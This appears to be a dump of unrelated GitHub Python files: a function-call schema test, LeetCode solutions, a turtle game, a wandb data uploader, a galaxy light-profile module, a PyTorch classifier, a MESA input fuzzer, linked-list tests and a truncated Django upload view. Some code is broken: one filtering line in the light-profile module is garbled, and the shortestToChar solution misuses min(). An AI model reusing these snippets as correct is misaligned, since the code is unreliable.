\"name\": \"test_function\",\n \"description\": \"Description of test function here.\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"str_param\": {\"type\": \"string\", \"description\": \"This is the string parameter.\"},\n \"float_param\": {\n \"type\": \"number\",\n \"description\": \"This is the float parameter.\",\n },\n \"int_param\": {\"type\": \"integer\", \"description\": \"This is the int parameter.\"},\n \"literal_param\": {\n \"type\": \"string\",\n \"enum\": [\"option1\", \"option2\"],\n \"description\": \"This is the literal parameter.\",\n },\n \"enum_param\": {\n \"type\": \"string\",\n \"enum\": [\"enum1\", \"enum2\"],\n \"description\": \"This is the enum parameter.\",\n },\n \"default_str_param\": {\n \"type\": \"string\",\n \"description\": \"This is the default string parameter.\",\n },\n },\n \"required\": [\"str_param\", \"float_param\", \"int_param\", \"literal_param\", \"enum_param\"],\n },\n }\n expected = CallableFunction(\n name=\"test_function\",\n params_model=params_model,\n function=test_function,\n api_dict=api_dict,\n doc_str=doc_str,\n )\n exclude = {\"doc_str\", \"params_model\"}\n # -- Asserts --\n assert callable_function.dict(exclude=exclude) == expected.dict(\n exclude=exclude\n ), f\"callable_function: {callable_function}\\nexpected: {expected}\"\n\n for field_key in callable_function.params_model.__fields__.keys():\n for property in [\"name\", \"type_\", \"default\", \"required\", \"alias\"]:\n assert getattr(callable_function.params_model.__fields__[field_key], property) == getattr(\n expected.params_model.__fields__[field_key], property\n ), f\"callable_function: {callable_function}\\nexpected: {expected}\"\n","repo_name":"joloppo/openai_func_call","sub_path":"tests/test_assembly.py","file_name":"test_assembly.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30474663633","text":"class Solution(object):\n def permute(self, nums):\n \n res = []\n \n #base case\n if (len(nums) == 1):#ssample input of nums = 1 then return it as a list or only single permutation \n return [nums[:]]\n \n for i in range(len(nums)):\n n = nums.pop(0)#first element i the list is popped while going thro the trree\n perms = self.permute(nums)#recursive call\n \n for perm in perms:\n perm.append(n)#the n from which we jave popped is apoended like 2,3 3,2 it is appended and in the next step the poppped elemtn is extened with this to get the permutations\n res.extend(perms)\n nums.append(n)\n \n return res\n","repo_name":"nidhish-create/LEETCODE-QUESTIONS","sub_path":"permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37065707011","text":"import random\nimport time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\nscreen.title(\"Crossy Turtle\")\nplayer = Player()\ncar_manager = CarManager()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkey(fun=player.move, key=\"w\")\n\ngame_is_on = True\nwhile game_is_on:\n\n time.sleep(0.1)\n screen.update()\n\n if random.randint(1, 5) == 1:\n car_manager.create_car()\n\n for car in car_manager.cars_list:\n if (car.distance(player)) < 25 and (player.ycor() - car.ycor() <= 12):\n print(car.ycor())\n print(player.ycor())\n game_is_on = False\n\n if player.ycor() > 280:\n player.refresh()\n car_manager.level_up()\n scoreboard.update_scoreboard()\n\n for car in car_manager.cars_list:\n if car.xcor() < -320:\n car.hideturtle()\n car_manager.cars_list.remove(car)\n\n car_manager.move_all()\n","repo_name":"jananpatel2002/turtle-crossing-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34776051644","text":"# upload_test_data.py\n# -----------------------------\n# The dataset owner runs this script to create two Artifacts:\n# - type=test_dataset: the ids & images, no labels\n# - type=labeled_test_dataset, contains the correct labels\n# These are stored in different projects (Demo project and Answers\n# project, respectively) so the test answers can be held secret.\nimport argparse\nimport numpy as np\nimport os\nfrom PIL import Image\nimport util\nimport wandb\n\ndef upload_test_data(args):\n # create test data artifact and table (ids and images only) \n demo_at = wandb.Artifact(\"test_data\", type=\"test_dataset\")\n columns = [\"id\", \"raw_image\"]\n demo_table = wandb.Table(columns=columns)\n\n # create the answers (labeled) artifact \n answers_at = wandb.Artifact(\"answer_key\", type=\"labeled_test_dataset\")\n answer_cols = [\"id\", \"raw_image\", \"labeled_image\", \"raw_label\"]\n answer_table = wandb.Table(columns=answer_cols)\n\n # upload images \n images = [f for f in os.listdir(args.image_path)][:util.NUM_EXAMPLES]\n for idx, image in enumerate(images):\n train_id = image.split(\".\")[0]\n image_file = os.path.join(args.image_path, image)\n raw_image = wandb.Image(image_file)\n \n label_file = os.path.join(args.label_path, train_id + \"_train_id.png\")\n \n # visualize the labels with full-featured semantic segmentation\n annotated = wandb.Image(image_file, classes=util.class_set,\n masks={\"ground_truth\" : {\"mask_data\": np.array(Image.open(label_file))}})\n\n # add images only to the Demo visualization table\n demo_table.add_data(train_id, raw_image)\n # add files to artifact (optional, needed here to explicitly set the path for download) \n demo_at.add_file(image_file, os.path.join(\"images\", image))\n\n # add images and labels to the Answer visualization table and artifact\n answer_table.add_data(train_id, raw_image, annotated, wandb.Image(np.array(Image.open(label_file))))\n answers_at.add_file(image_file, os.path.join(\"images\", image))\n answers_at.add_file(label_file, os.path.join(\"labels\", train_id + \"_train_id.png\"))\n\n # add tables to artifacts\n demo_at.add(demo_table, \"test_data\")\n answers_at.add(answer_table, \"answer_key\")\n\n # upload the unlabeled test data to the Demo project\n run = wandb.init(project=args.demo_project, job_type=\"upload_test_data\")\n run.log_artifact(demo_at)\n run.finish()\n\n # upload the labeled test data to the Answer project\n run = wandb.init(project=args.answer_project, job_type=\"upload_test_data\")\n run.log_artifact(answers_at)\n run.finish()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-d\",\n \"--demo_project\",\n type=str,\n default=util.DEMO_PROJECT,\n help=\"demo project name: where participants will find the test data\")\n parser.add_argument(\n \"-a\",\n \"--answer_project\",\n type=str,\n default=util.ANSWER_PROJECT,\n help=\"answer project name: where organizers will see the test answers and evaluations\")\n parser.add_argument(\n \"-i\",\n \"--image_path\",\n type=str,\n default=\"../../../BigData/bdd100K/bdd100k/seg/images/train/\",\n help=\"source path for image data\")\n parser.add_argument(\n \"-l\",\n \"--label_path\",\n type=str,\n default=\"../../../BigData/bdd100K/bdd100k/seg/labels/train/\",\n help=\"source path for ground truth labels\")\n \n args = parser.parse_args()\n upload_test_data(args)\n\n","repo_name":"staceysv/evalserver","sub_path":"upload_test_data.py","file_name":"upload_test_data.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35836328521","text":"class Solution:\n def shortestToChar(self, S, C):\n s_len = len(S)\n dist_arr = [float('inf')] * s_len\n c_idx = float('inf')\n\n for idx, ch in enumerate(S):\n if ch == C:\n c_idx = idx\n dist_arr[idx] = min(dist_arr, abs(c_idx - idx))\n\n c_idx = float('inf')\n for idx in range(s_len - 1, -1, -1):\n if S[idx] == C:\n c_idx = idx\n dist_arr[idx] = min(dist_arr, abs(c_idx - idx))\n return dist_arr\n","repo_name":"s-surineni/atice","sub_path":"leet_code/shortest_dist_to_char2.py","file_name":"shortest_dist_to_char2.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74041074960","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.tri as tri\n\nfrom visualization_functions import *\nfrom ellipsoid_projection import *\nfrom alignment_functions import *\nfrom lightProfile_functions import *\n\nimport time, random, scipy\nfrom scipy.spatial.transform import Rotation as R\nimport scipy.special\nimport scipy.interpolate\n\n\ndef get_projected_shape_fromParameters(c, b, a=1, r_matrix='random', p_axis='x'):\n '''project 3D ellipse to random orientation given minor, mid, and major axis lengths. \n Returns 2D axis ratio projected along p_axis'''\n \n if type(r_matrix)==str:\n r_matrix = R.random()\n r_matrix.as_matrix()\n\n # eigen vectors\n evc0 = np.asarray([[0,0,1],[0,1,0],[1,0,0]])\n evc = r_matrix.apply(evc0)\n\n evl = np.asarray([c, b, a])**2\n \n if p_axis=='x':\n K = np.sum(evc[:,0][:,None] * (evc / evl[:,None]), axis=0)\n r = evc[:,2] - evc[:,0]*K[2]/K[0]\n s = evc[:,1] - evc[:,0]*K[1]/K[0]\n \n if p_axis=='y':\n K = np.sum(evc[:,1][:,None] * (evc / evl[:,None]), axis=0)\n\n r = evc[:,0] - evc[:,1]*K[0]/K[1]\n s = evc[:,2] - evc[:,1]*K[2]/K[1]\n \n A = np.sum(r**2 / evl, axis=0)\n B = np.sum(2*r*s / evl, axis=0)\n C = np.sum(s**2 / evl, axis=0)\n # for p_axis='x', theta is the angle relative to z, in the direciton of +y\n # for p_axis='y', theta is the angle relative to x, in the direciton of +z\n theta = np.pi/2 + np.arctan2(B, A-C) / 2\n a_p = 1 / np.sqrt((((A+C)/2) + ((A-C)/(2*np.cos(2*theta)))))\n b_p = 1 / np.sqrt(A + C - (1/a_p**2))\n \n return (b_p/a_p), theta\n\n\n\n### LIGHT PROFILE PARAMETERS ####################\n# From https://github.com/dstndstn/tractor/blob/main/tractor/mixture_profiles.py\nmix_A_luv = np.array([4.26347652e-02, 2.40127183e-01, 6.85907632e-01, 1.51937350e+00,\n 2.83627243e+00, 4.46467501e+00, 5.72440830e+00, 5.60989349e+00])\nmix_r_luv = np.sqrt(np.array([2.23759216e-04, 1.00220099e-03, 4.18731126e-03, 1.69432589e-02,\n 6.84850479e-02, 2.87207080e-01, 1.33320254e+00, 8.40215071e+00]))\ndev_core = 0.010233\nmix_A_luv *= (1. - dev_core) / np.sum(mix_A_luv)\nmix_A_luv = np.append(mix_A_luv, dev_core)\nmix_r_luv = np.append(mix_r_luv, 1.0e-08)\n\ndef luv_profile(r):\n profile = r*0.0\n for j in range(len(mix_r_luv)):\n profile = profile + np.exp(-(r/mix_r_luv[j])**2/2.0)*mix_A_luv[j]/mix_r_luv[j]**3\n return profile\n\nmix_A_lux = np.array([2.34853813e-03, 3.07995260e-02, 2.23364214e-01,\n 1.17949102e+00, 4.33873750e+00, 5.99820770e+00])\nmix_r_lux = np.sqrt(np.array([1.20078965e-03, 8.84526493e-03, 3.91463084e-02,\n 1.39976817e-01, 4.60962500e-01, 1.50159566e+00]))\n\ndef lux_profile(r):\n profile = r*0.0\n for j in range(len(mix_r_lux)):\n profile = profile + np.exp(-(r/mix_r_lux[j])**2/2.0)*mix_A_lux[j]/mix_r_lux[j]**3\n return profile\n\n\ndef exp_profile(r):\n return scipy.special.kn(0,r)\n\ndef Hern_profile(r):\n return 1.0/r/(r+1)**3\n\ndef make_profile_rs(f, binwidth=np.full(20*100, 0.01)):\n # This is written so that one can use non-uniform bin widths in later application\n rcen = np.cumsum(binwidth)-binwidth[0]/2.0\n mass_profile = np.insert(np.cumsum(rcen**2*f(rcen)*binwidth+1e-10), 0, 0.0)\n mass_profile = mass_profile/mass_profile[-1]\n r_profile = np.insert(rcen+0.5*binwidth, 0, 0.0)\n spline = scipy.interpolate.InterpolatedUnivariateSpline(mass_profile, r_profile)\n halfmass = spline(0.5)\n rad_3d = spline((np.arange(1e5)+0.5)/1e5)/halfmass\n return rad_3d\n#############################\n\n\ndef get_light_profile(model_type, N=100000):\n \n if model_type == 'DEV':\n r = make_profile_rs(luv_profile)\n elif model_type == 'EXP' or model_type == 'PSF' or model_type == 'REX':\n r = make_profile_rs(lux_profile)\n elif model_type == 'SER':\n r = make_profile_rs(Hern_profile)\n else:\n print(model_type)\n r = make_profile_rs(Hern_profile)\n \n r_max=1\n # generating uniform points in cube\n q=int((N*2)**(1/3))\n x_ = np.linspace(-r_max, r_max, q)\n y_ = np.linspace(-r_max, r_max, q)\n z_ = np.linspace(-r_max, r_max, q)\n x0, y0, z0 = np.meshgrid(x_, y_, z_)\n frame0 = np.asarray([x0.flatten(), y0.flatten(), z0.flatten()])\n \n dists = frame0[0]**2 + frame0[1]**2 + frame0[2]**2\n inside_r = frame0[:,(((dists)0))] # reject all outside a sphere and any that might be at 0\n h_points = inside_r[:,np.random.randint(0, len(inside_r[0]), N)] # match number of r\n h_points = r * h_points / np.sqrt(h_points[0]**2 + h_points[1]**2 + h_points[2]**2) # scale by radii\n return h_points\n\n\n\ndef shape_transformation_2D(a, b, c, r_matrix, h_points, scale=1, p_axis='z'):\n '''\n a, b, c: relative sizes of axis ratios\n scale: size of galaxy\n orientation_angle0, orientation_angle1: orientation about z and y, respectively\n '''\n r_matrix.as_matrix()\n scale_matrix = np.asarray([[a,0,0],[0,b,0],[0,0,c]])\n shape_scaled = np.matmul(scale_matrix, h_points)\n M3D = r_matrix.apply(shape_scaled.transpose()).transpose()\n \n if p_axis=='z':\n return M3D[:2] # retain just the x and y direction\n if p_axis=='x':\n return M3D[1:] # retain just the y and z direction\n \n\n\n\ndef find_r_half(h_points):\n return np.sqrt(np.median(h_points[0]**2 + h_points[1]**2))\n\n\ndef app_sum(M_points_2D, rad_image_sq):\n in_aperature = (M_points_2D[0]**2 + M_points_2D[1]**2) < rad_image_sq\n \n return len(M_points_2D[:,in_aperature][0])","repo_name":"cmlamman/ellipse_alignment","sub_path":"functions/lightProfile_functions.py","file_name":"lightProfile_functions.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17594704229","text":"import os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision import transforms, datasets\nfrom PIL import Image\nfrom sklearn.metrics import f1_score\n\n\n# 1. Load and preprocess the dataset\nclass CustomDataset(Dataset):\n def __init__(self, root_dir, transform=None):\n self.root_dir = root_dir\n self.transform = transform\n self.images, self.labels = self.load_data()\n\n def load_data(self):\n img_paths = []\n labels = []\n self.classes = os.listdir(self.root_dir)\n for label, class_name in enumerate(self.classes):\n class_dir = os.path.join(self.root_dir, class_name)\n for img_name in os.listdir(class_dir):\n img_paths.append(os.path.join(class_dir, img_name))\n labels.append(label)\n return img_paths, labels\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, idx):\n img_path = self.images[idx] # получение пути к изображению\n image = Image.open(img_path).convert('RGB') # открытие и конвертация изображения в RGB\n label = self.labels[idx]\n if self.transform:\n image = self.transform(image)\n return image, label\n\n def __str__(self):\n class_str = \", \".join(self.classes)\n return f\"CustomDataset with classes: {class_str}\"\n\n\nclass VGGLike(nn.Module):\n def __init__(self):\n super(VGGLike, self).__init__()\n\n self.features = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n nn.Conv2d(64, 128, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 128, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n )\n\n self.classifier = nn.Sequential(\n nn.Linear(128 * 32 * 32, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, 1),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n x = self.classifier(x)\n return torch.sigmoid(x)\n\n\n# 2. Define the CNN model\nclass CNNModel(nn.Module):\n def __init__(self):\n super(CNNModel, self).__init__()\n self.conv1 = nn.Conv2d(3, 16, kernel_size=3, stride=1, padding=1)\n self.relu = nn.ReLU()\n self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)\n self.fc1 = nn.Linear(16 * 64 * 64, 1)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.relu(out)\n out = self.maxpool(out)\n out = out.view(out.size(0), -1)\n out = self.fc1(out)\n out = torch.sigmoid(out) # Применяем сигмоиду\n return out\n\n\nif __name__ == \"__main__\":\n\n print(torch.cuda.is_available())\n device = torch.device('cuda')\n # if torch.cuda.is_available() else 'cpu')\n\n transform = transforms.Compose([\n transforms.Resize((130, 130)), # resizing to a bit larger size before random crop\n transforms.RandomCrop((128, 128)),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(10),\n transforms.ToTensor(),\n ])\n\n train_dataset = CustomDataset(\"train_data\", transform)\n print(train_dataset)\n\n train_loader = DataLoader(train_dataset, batch_size=32, shuffle=True)\n\n model = VGGLike()\n model.to(device)\n\n # 3. Define the loss function and optimizer\n criterion = nn.BCELoss()\n optimizer = optim.Adam(model.parameters(), lr=0.001)\n\n # 4. Train the model\n for epoch in range(10): # loop over the dataset multiple times\n\n running_loss = 0.0\n all_preds = [] # Store all predictions\n all_labels = [] # Store all true labels\n\n for i, (inputs, labels) in enumerate(train_loader, 0):\n inputs, labels = inputs.to(device), labels.to(device)\n\n # Изменяем форму меток и конвертируем их в float\n labels = labels.view(-1, 1).float()\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n\n # Store predictions and true labels\n preds = outputs.detach().cpu().numpy() > 0.5 # Convert to binary predictions\n all_preds.extend(preds)\n all_labels.extend(labels.cpu().numpy())\n\n # Calculate F1 Score\n f1 = f1_score(all_labels, all_preds, average='binary') # you can choose other averaging methods\n print(f'Epoch {epoch + 1}, Loss: {running_loss / len(train_loader)}, F1 Score: {f1:.4f}')\n\n print('Finished Training')\n\n# 5. Evaluate the model\n# You may want to use a separate validation dataset to evaluate your model's performance","repo_name":"Alar-q/DysgraphiaRMAT","sub_path":"DevStageMesh/computerVisionAitu/scratch_nn.py","file_name":"scratch_nn.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6509873274","text":"import numpy as np\nfrom subprocess import check_output, STDOUT\nimport numpy, time\nnumpy.random.seed(int(time.time()))\n\nmaxInt = 10\nbase_float = [1e-4, 1, 1e2, 1e10]\nbool_opts = ['.false.', '.true.']\n\ndef make_int():\n\treturn str(np.random.randint(2*maxInt+1) - maxInt)\n\ndef make_float():\n\tbase_val = np.random.choice(base_float)\n\treturn str(np.random.randn() * base_val)\n\ndef make_bool():\n\treturn np.random.choice(bool_opts)\n\ndef make_val(prototype):\n\tkind = value_classifier(prototype)\n\tif kind == 'bool':\n\t\treturn make_bool()\n\telif kind == 'float':\n\t\treturn make_float()\n\telse:\n\t\treturn make_int()\n\ndef make_inlist(fname, star_job, controls):\n\tfi = open(fname, 'w+')\n\n\tfi.write('&star_job\\n')\n\tfi.write(star_job)\n\tfi.write('\\n/ !end of star_job\\n')\n\n\tfi.write('&controls\\n')\n\tfi.write(controls)\n\tfi.write('\\n/ ! end of controls\\n')\n\n\tfi.close()\n\ndef make_directory(dirName):\n\tcheck_output('cp -R prototype ' + dirName, shell=True)\n\tcheck_output('cd ' + dirName + '; ./clean; ./mk', shell=True)\n\ndef run_MESA(dirName, timeout=10, timeout_command='gtimeout'):\n\ttry:\n\t\tout = check_output('cd ' + dirName + '; ' + timeout_command + ' ' + str(timeout) + ' \"./rn\"', shell=True, stderr=STDOUT)\n\texcept Exception as e:\n\t\tout = e.output\n\treturn out\n\ndef value_classifier(opt):\n\tif opt == '.false.' or opt == '.true.':\n\t\treturn 'bool'\t\n\n\tif '\\'' in opt or '\\\"' in opt:\n\t\treturn 'string'\n\n\topt = opt.replace('d', 'e+')\n\n\ttry:\n\t\tx = int(opt)\n\t\treturn 'int'\n\texcept:\n\t\ttry:\n\t\t\tx = np.float(opt)\n\t\t\treturn 'float'\n\t\texcept:\n\t\t\treturn 'string'\n\ndef parse_defaults(fname):\n\tfi = open(fname, 'r')\n\topts = []\n\tvals = []\n\tfor line in fi:\n\t\tx = line.lstrip()\n\t\tx = x.strip('\\n')\n\t\tif len(x) == 0 or x[0] == '!':\n\t\t\tcontinue\n\n\t\tx = x.split('=')\n\n\t\topt = x[0].strip()\n\n\t\tif '(' in opt or ')' in opt:\n\t\t\tcontinue\n\n\t\tval = x[1].lstrip()\n\t\tval = val.split(' ')\n\t\tval = val[0]\n\t\tval = val.strip()\n\n\t\topts.append(opt)\n\t\tvals.append(val)\n\n\treturn opts, vals\n\ndef make_controls(opts, vals, indices, mandatory_controls):\n\tcontrols = ''\n\tfor i in indices:\n\t\topt = opts[i]\n\t\tval = vals[i]\n\n\t\t# Filtering to avoid playing with silly options\n\t\tif 'read_extra' in opt:\n\t\t\tcontinue\n\n\t\tif value_classifier(val) != 'string':\n\t\t\tcontrols = controls + opt + ' = ' + make_val(val) + '\\n'\n\n\tcontrols = controls + mandatory_controls\n\n\treturn controls\n\ncopt, cval = parse_defaults('controls.defaults')\nsopt, sval = parse_defaults('star_job.defaults')\nmake_directory('trial')\nmandatory_controls = 'report_ierr = .true.\\n'\nbad_strings = ['failed', 'nan', 'error']\nrepeats = 5\ncounter = 0\n\nfrom itertools import combinations\n\nfor r in range(len(copt)):\n\tcomb = combinations(range(len(copt)), r)\n\tfor i,indices in enumerate(comb):\n\t\tfor r in range(repeats):\n\t\t\tcontrols = make_controls(copt, cval, indices, mandatory_controls)\n\t\t\tstar_job = make_controls(sopt, sval, [], '')\n\n\t\t\tmake_inlist('trial/inlist_project', star_job, controls)\n\t\t\tout = run_MESA('trial', timeout=10, timeout_command='gtimeout')\n\t\t\tout = str(out)\n\t\t\tout = out.replace('\\\\n','\\n')\n\t\t\tcounter += 1\n\n\t\t\tfor bs in bad_strings:\n\t\t\t\tif bs in out.lower():\n\t\t\t\t\tprint('Bad string detected in trial ' + str(counter) + ':', bs)\n\t\t\t\t\tcontrols = \"\\n\".join([ll.rstrip() for ll in controls.splitlines() if ll.strip()])\n\t\t\t\t\tstar_job = \"\\n\".join([ll.rstrip() for ll in star_job.splitlines() if ll.strip()])\n\t\t\t\t\tprint(controls)\n\t\t\t\t\tprint(star_job)\n#\t\t\t\t\tprint(out)\n\t\t\t\t\tprint('--------------------------------')","repo_name":"adamjermyn/MESA_Fuzzer","sub_path":"fuzzer.py","file_name":"fuzzer.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30703294804","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests for double.py.\"\"\"\nfrom __future__ import unicode_literals\n\nimport pytest\nfrom double import DNode, DList\n\n\nTYPE_TABLE = [\n '1',\n 1,\n '-' * 10000,\n 'āĕijœ',\n '',\n b'1234',\n '12345\\t',\n [1, 2, 3],\n (1, 2, 3)\n]\n\nTABLE_LENGTHS = [\n (['a'], \"(a)\"),\n (['a', ' b'], \"(b, a)\"),\n (['a', 'b', 'c'], \"(c, b, a)\"),\n (('a b c ' * 5).split(), \"(c, b, a, c, b, a, c, b, a, c, b, a, c, b, a)\"),\n ([], None)\n]\n\nLONG_LIST = ('a b c ' * 10000).split()\n\nSEARCH_TABLE = [\n (['a'], 'a', True),\n (['1'], '1', True),\n ([], '1', False),\n ([1, 2, 3], 1, True),\n ([1, 2, 3], '1', False),\n ([1, 2, 3], 4, False),\n ([[1, 2], 3], 1, False),\n ([[1, 2], 3], [1, 2], True),\n ([1, 2, 3], None, False),\n ([1, 2, 3, 2], 2, True),\n ([1] + LONG_LIST, 1, True),\n (LONG_LIST + [1], 1, True),\n (TYPE_TABLE, b'1234', True),\n (TYPE_TABLE, 'āĕijœ', True),\n (TYPE_TABLE, '12345\\t', True),\n (TYPE_TABLE, (1, 2, 3), True),\n]\n\n# DNode Tests\n\n\n@pytest.mark.parametrize('init_value', TYPE_TABLE)\ndef test_dnode_init_value(init_value):\n \"\"\"Test that the values initialize correctly.\"\"\"\n test_dnode = DNode(init_value)\n assert test_dnode.value == init_value\n\n\ndef test_dnode_init_next_node():\n \"\"\"Test that the next_node pointer initializes correctly.\"\"\"\n test_dnode = DNode('test')\n assert test_dnode.next_node is None\n\n\ndef test_dnode_init_prev_node():\n \"\"\"Test that the prev_node pointer initializes correctly.\"\"\"\n test_dnode = DNode('test')\n assert test_dnode.prev_node is None\n\n\ndef test_dnode_next_node():\n \"\"\"Test that the next node pointer returns the correct node.\"\"\"\n test_dnode = DNode('test')\n second_dnode = DNode('second_node', test_dnode)\n assert second_dnode.next_node == test_dnode\n\n\ndef test_dnode_pointer():\n \"\"\"Test that the previous node pointer returns the correct node.\"\"\"\n test_dnode = DNode('test')\n second_node = DNode('second_node', prev_node=test_dnode)\n assert second_node.prev_node == test_dnode\n\n# DList Tests\n\n\ndef test_empty_list_length():\n \"\"\"Test to see if any empty string has length zero.\"\"\"\n empty_list = DList()\n assert empty_list.length == 0\n\n\ndef test_empty_list_head():\n \"\"\"Test to see if in an empty list the head is none.\"\"\"\n empty_list = DList()\n assert empty_list.head is None\n\n\ndef test_empty_list_tail():\n \"\"\"Test to see if in an empty list the tail is none.\"\"\"\n empty_list = DList()\n assert empty_list.tail is None\n\n\n@pytest.mark.parametrize('init_value', TYPE_TABLE)\ndef test_list_push_empty(init_value):\n \"\"\"Test push on an empty list.\"\"\"\n test_list = DList()\n test_list.push(init_value)\n assert test_list.head.value == init_value\n\n\ndef test_list_push_head_value():\n \"\"\"Test push on a non-empty list. Make sure pushing to head.\"\"\"\n test_list = DList()\n test_list.push('first_node')\n test_list.push('second_node')\n assert test_list.head.value == 'second_node'\n\n\n@pytest.mark.parametrize('init_value', TYPE_TABLE)\ndef test_list_append_empty(init_value):\n \"\"\"Test append on an empty list.\"\"\"\n test_list = DList()\n test_list.append(init_value)\n assert test_list.tail.value == init_value\n\n\ndef test_list_append_tail_value():\n \"\"\"Test append on a non-empty list. Make sure appending to tail.\"\"\"\n test_list = DList()\n test_list.append('first_node')\n test_list.append('second_node')\n assert test_list.tail.value == 'second_node'\n\n\ndef test_list_push_next():\n \"\"\"Test push on a non-empty list. Make sure that next pointer is initializing correctly.\"\"\"\n test_list = DList()\n test_list.push('test_string')\n test_list.push('second_node')\n assert test_list.head.next_node.value == 'test_string'\n\n\n@pytest.mark.parametrize('init_list, result', TABLE_LENGTHS)\ndef test_push_length(init_list, result):\n \"\"\"Test length is correct after a push.\"\"\"\n test_list = DList(init_list)\n test_list.push('some_string')\n assert test_list.length == len(init_list) + 1\n\n\ndef test_list_append_next():\n \"\"\"Test append on a non-empty list. Make sure that next pointer is initializing correctly.\"\"\"\n test_list = DList()\n test_list.append('test_string')\n test_list.append('second_node')\n assert test_list.tail.prev_node.value == 'test_string'\n\n\ndef test_append_length():\n \"\"\"Test length is correct after an append.\"\"\"\n test_list = DList(['a', 'b', 'c'])\n test_list.append('some_string')\n assert test_list.length == 4\n\n\n@pytest.mark.parametrize('init_value', TYPE_TABLE)\ndef test_pop(init_value):\n \"\"\"Test pop returns correct value.\"\"\"\n test_list = DList()\n test_list.push(init_value)\n assert test_list.pop() == init_value\n\n\ndef test_pop_empty():\n \"\"\"Test that popping an empty string returns None.\"\"\"\n test_list = DList()\n assert test_list.pop() is None\n\n\ndef test_pop_length():\n \"\"\"Test length is correct after a pop. If pop a zero length list, should still be 0.\"\"\"\n test_list = DList(['a', 'b', 'c'])\n test_list.pop()\n assert test_list.length == 2\n\n\n@pytest.mark.parametrize('init_value', TYPE_TABLE)\ndef test_shift(init_value):\n \"\"\"Test shift returns correct value.\"\"\"\n test_list = DList()\n test_list.append(init_value)\n assert test_list.shift() == init_value\n\n\ndef test_shift_empty():\n \"\"\"Test that shifting an empty string returns None.\"\"\"\n test_list = DList()\n assert test_list.shift() is None\n\n\ndef test_shift_length():\n \"\"\"Test length is correct after a shift. If shift a zero length list, should still be 0.\"\"\"\n test_list = DList(['a', 'b', 'c'])\n test_list.shift()\n assert test_list.length == 2\n\n\ndef test_size_xl():\n \"\"\"Test init and size on an xl list.\"\"\"\n test_list = DList(LONG_LIST)\n assert test_list.size() == 30000\n\n\n@pytest.mark.parametrize('init_list, search_val, val_is_expected', SEARCH_TABLE)\ndef test_search(init_list, search_val, val_is_expected):\n \"\"\"Test display function on longer strings.\"\"\"\n test_list = DList(init_list)\n if val_is_expected:\n assert test_list.search(search_val).value == search_val\n else:\n with pytest.raises(IndexError):\n test_list.search(search_val)\n\n\ndef test_remove_node_length():\n \"\"\"Test length is correct after a remove.\"\"\"\n test_list = DList(['a', 'b', 'c'])\n node_to_remove = test_list.search('c')\n test_list.remove_node(node_to_remove)\n assert test_list.length == 2\n","repo_name":"jefferyrayrussell/data-structures","sub_path":"src/test_double.py","file_name":"test_double.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71476172562","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nimport time\nfrom .models import LunBo\nfrom .forms import PhotoForm\n# Create your views here.\n\ndef upload_image(request):\n if request.method == 'POST':\n form = PhotoForm(request.POST,request.FILES)\n if form.is_valid():\n #判断是否上传了文件\n\n if 'docfile' in request.FILES:\n image = request.FILES[\"docfile\"]\n\n #修改文件名字\n image.name = str(request.user)+str(time)+'.jpg'\n\n s = LunBo()\n s.name = form.cleaned_data[\"name\"]\n s.owner = request.user\n s.description = form.cleaned_data[\"description\"]\n s.image = form.cleaned_data[\"image\"]\n s.save()\n return HttpResponse('上传成功')\n else:\n #没有上传文件直接点了上传就重定向到上传页面\n return redirect('lunbo/upload_img.html')\n else:\n\n image = None\n return HttpResponse('上传失败')\n else:\n return 